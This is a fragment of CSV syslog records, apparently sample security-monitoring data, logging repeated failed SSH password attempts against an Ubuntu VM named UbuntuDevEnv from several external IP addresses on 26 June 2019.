+18705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:16,UbuntuDevEnv,2019-06-26 10:40:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:16,UbuntuDevEnv,2019-06-26 10:40:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:18,UbuntuDevEnv,2019-06-26 10:40:18,auth,UbuntuDevEnv,info,Failed password for invalid user zachary from 37.59.6.106 port 56246 ssh2,87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,56246,,
+18708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:19,UbuntuDevEnv,2019-06-26 10:40:18,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56246:11: Bye Bye [preauth],87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56246,,
+18709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:19,UbuntuDevEnv,2019-06-26 10:40:18,auth,UbuntuDevEnv,info,Disconnected from invalid user zachary 37.59.6.106 port 56246 [preauth],87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,56246,,
+18710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:02,UbuntuDevEnv,2019-06-26 10:41:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.30.117.22  user=root,87791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.30.117.2,,0,
+18711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:04,UbuntuDevEnv,2019-06-26 10:41:03,auth,UbuntuDevEnv,info,Failed password for root from 112.30.117.22 port 55144 ssh2,87791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.30.117.2,55144,,
+18712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:04,UbuntuDevEnv,2019-06-26 10:41:04,auth,UbuntuDevEnv,info,"Received disconnect from 112.30.117.22 port 55144:11: Normal Shutdown, Thank you for playing [preauth]",87791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.30.117.2,55144,,
+18713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:04,UbuntuDevEnv,2019-06-26 10:41:04,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 112.30.117.22 port 55144 [preauth],87791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,112.30.117.2,55144,,
+18714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:09,UbuntuDevEnv,2019-06-26 10:41:09,auth,UbuntuDevEnv,info,Invalid user zxcloudsetup from 47.44.115.81 port 45180,87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,47.44.115.8,45180,,
+18715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:09,UbuntuDevEnv,2019-06-26 10:41:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:09,UbuntuDevEnv,2019-06-26 10:41:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:11,UbuntuDevEnv,2019-06-26 10:41:11,auth,UbuntuDevEnv,info,Failed password for invalid user zxcloudsetup from 47.44.115.81 port 45180 ssh2,87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,47.44.115.8,45180,,
+18718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:12,UbuntuDevEnv,2019-06-26 10:41:11,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 45180:11: Bye Bye [preauth],87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,45180,,
+18719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:12,UbuntuDevEnv,2019-06-26 10:41:11,auth,UbuntuDevEnv,info,Disconnected from invalid user zxcloudsetup 47.44.115.81 port 45180 [preauth],87817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,47.44.115.8,45180,,
+18720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:25,UbuntuDevEnv,2019-06-26 10:41:25,auth,UbuntuDevEnv,info,Invalid user vps from 200.209.174.76 port 56203,87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,200.209.174.7,56203,,
+18721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:25,UbuntuDevEnv,2019-06-26 10:41:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:25,UbuntuDevEnv,2019-06-26 10:41:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:27,UbuntuDevEnv,2019-06-26 10:41:27,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 200.209.174.76 port 56203 ssh2,87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,200.209.174.7,56203,,
+18724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:27,UbuntuDevEnv,2019-06-26 10:41:27,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 200.209.174.76 port 56203 [preauth],87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,200.209.174.7,56203,,
+18725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:27,UbuntuDevEnv,2019-06-26 10:41:27,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 56203:11: Bye Bye [preauth],87885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,56203,,
+18726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:43,UbuntuDevEnv,2019-06-26 10:41:43,auth,UbuntuDevEnv,info,Invalid user kslewin from 37.59.6.106 port 44922,87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kslewin,37.59.6.1,44922,,
+18727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:43,UbuntuDevEnv,2019-06-26 10:41:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:43,UbuntuDevEnv,2019-06-26 10:41:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,auth,UbuntuDevEnv,info,Invalid user student07 from 106.13.142.247 port 53970,87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student07,106.13.142.2,53970,,
+18730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,auth,UbuntuDevEnv,info,Failed password for invalid user kslewin from 37.59.6.106 port 44922 ssh2,87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kslewin,37.59.6.1,44922,,
+18733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 44922:11: Bye Bye [preauth],87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,44922,,
+18734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:45,UbuntuDevEnv,2019-06-26 10:41:45,auth,UbuntuDevEnv,info,Disconnected from invalid user kslewin 37.59.6.106 port 44922 [preauth],87949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kslewin,37.59.6.1,44922,,
+18735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:47,UbuntuDevEnv,2019-06-26 10:41:47,auth,UbuntuDevEnv,info,Failed password for invalid user student07 from 106.13.142.247 port 53970 ssh2,87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student07,106.13.142.2,53970,,
+18736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:47,UbuntuDevEnv,2019-06-26 10:41:47,auth,UbuntuDevEnv,info,Disconnected from invalid user student07 106.13.142.247 port 53970 [preauth],87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student07,106.13.142.2,53970,,
+18737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:41:47,UbuntuDevEnv,2019-06-26 10:41:47,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 53970:11: Bye Bye [preauth],87948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,53970,,
+18738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:13,UbuntuDevEnv,2019-06-26 10:43:12,auth,UbuntuDevEnv,info,Invalid user shiny from 37.59.6.106 port 33598,88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shiny,37.59.6.1,33598,,
+18739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:13,UbuntuDevEnv,2019-06-26 10:43:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:13,UbuntuDevEnv,2019-06-26 10:43:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:14,auth,UbuntuDevEnv,info,Failed password for invalid user shiny from 37.59.6.106 port 33598 ssh2,88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shiny,37.59.6.1,33598,,
+18742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:14,auth,UbuntuDevEnv,info,Disconnected from invalid user shiny 37.59.6.106 port 33598 [preauth],88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shiny,37.59.6.1,33598,,
+18743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:14,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 33598:11: Bye Bye [preauth],88269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,33598,,
+18744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:15,auth,UbuntuDevEnv,info,Invalid user sean from 47.44.115.81 port 34198,88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,47.44.115.8,34198,,
+18745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:15,UbuntuDevEnv,2019-06-26 10:43:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:17,UbuntuDevEnv,2019-06-26 10:43:17,auth,UbuntuDevEnv,info,Failed password for invalid user sean from 47.44.115.81 port 34198 ssh2,88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,47.44.115.8,34198,,
+18748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:17,UbuntuDevEnv,2019-06-26 10:43:17,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 34198:11: Bye Bye [preauth],88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,34198,,
+18749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:17,UbuntuDevEnv,2019-06-26 10:43:17,auth,UbuntuDevEnv,info,Disconnected from invalid user sean 47.44.115.81 port 34198 [preauth],88262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,47.44.115.8,34198,,
+18750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:21,UbuntuDevEnv,2019-06-26 10:43:21,auth,UbuntuDevEnv,info,Invalid user sudo from 106.13.142.247 port 37998,88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sudo,106.13.142.2,37998,,
+18751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:21,UbuntuDevEnv,2019-06-26 10:43:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:21,UbuntuDevEnv,2019-06-26 10:43:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:23,UbuntuDevEnv,2019-06-26 10:43:23,auth,UbuntuDevEnv,info,Failed password for invalid user sudo from 106.13.142.247 port 37998 ssh2,88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sudo,106.13.142.2,37998,,
+18754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:24,UbuntuDevEnv,2019-06-26 10:43:23,auth,UbuntuDevEnv,info,Disconnected from invalid user sudo 106.13.142.247 port 37998 [preauth],88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sudo,106.13.142.2,37998,,
+18755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:43:24,UbuntuDevEnv,2019-06-26 10:43:23,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 37998:11: Bye Bye [preauth],88297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,37998,,
+18756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:45,UbuntuDevEnv,2019-06-26 10:44:45,auth,UbuntuDevEnv,info,Invalid user nmrih from 37.59.6.106 port 50528,88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmrih,37.59.6.1,50528,,
+18757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:45,UbuntuDevEnv,2019-06-26 10:44:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:45,UbuntuDevEnv,2019-06-26 10:44:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:48,UbuntuDevEnv,2019-06-26 10:44:47,auth,UbuntuDevEnv,info,Failed password for invalid user nmrih from 37.59.6.106 port 50528 ssh2,88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmrih,37.59.6.1,50528,,
+18760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:48,UbuntuDevEnv,2019-06-26 10:44:47,auth,UbuntuDevEnv,info,Disconnected from invalid user nmrih 37.59.6.106 port 50528 [preauth],88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmrih,37.59.6.1,50528,,
+18761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:44:48,UbuntuDevEnv,2019-06-26 10:44:47,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 50528:11: Bye Bye [preauth],88600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,50528,,
+18762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:00,UbuntuDevEnv,2019-06-26 10:45:00,auth,UbuntuDevEnv,info,Invalid user uftp from 106.13.142.247 port 50262,88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,106.13.142.2,50262,,
+18763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:00,UbuntuDevEnv,2019-06-26 10:45:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:00,UbuntuDevEnv,2019-06-26 10:45:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
